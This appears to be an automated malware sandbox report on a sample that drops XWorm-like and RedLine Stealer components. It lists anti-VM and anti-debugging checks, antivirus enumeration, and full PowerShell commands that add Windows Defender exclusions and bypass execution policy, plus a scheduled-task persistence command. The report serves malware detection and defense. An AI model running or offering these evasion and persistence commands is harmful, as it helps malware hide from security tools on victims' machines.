Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477

Source: XClient.exe.1.dr	Binary or memory string: vmware
Source: XClient.exe, 00000002.00000002.2616566431.000000001B8F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Output.exe, 00000001.00000002.1319173524.00000000006A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Ok0D]-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\ProgramData\XClient.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\ProgramData\XClient.exe

Code function: 2_2_00007FF886E47BE1 CheckRemoteDebuggerPresent,

2_2_00007FF886E47BE1

Source: C:\ProgramData\XClient.exe

Process queried: DebugPort

Jump to behavior

Source: C:\ProgramData\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\build.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Output.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\ProgramData\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'

Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\XClient.exe "C:\ProgramData\XClient.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Process created: C:\ProgramData\build.exe "C:\ProgramData\build.exe"	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\mstc.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'	Jump to behavior
Source: C:\ProgramData\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "mstc" /tr "C:\Users\user\AppData\Local\Temp\mstc.exe"	Jump to behavior

Source: XClient.exe, 00000002.00000002.2585450577.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2585450577.0000000002A14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000002.00000002.2585450577.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2585450577.0000000002A14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: XClient.exe, 00000002.00000002.2585450577.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2585450577.0000000002A14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000002.00000002.2585450577.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2585450577.0000000002A14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: XClient.exe, 00000002.00000002.2585450577.0000000002A29000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2585450577.0000000002A14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Source: C:\Users\user\Desktop\Output.exe	Queries volume information: C:\Users\user\Desktop\Output.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\XClient.exe	Queries volume information: C:\ProgramData\XClient.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\XClient.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\ProgramData\build.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\mstc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\mstc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\mstc.exe VolumeInformation

Source: C:\Users\user\Desktop\Output.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: XClient.exe, 00000002.00000002.2623178489.000000001B9AB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000002.00000002.2632132964.000000001C540000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ProgramData\XClient.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
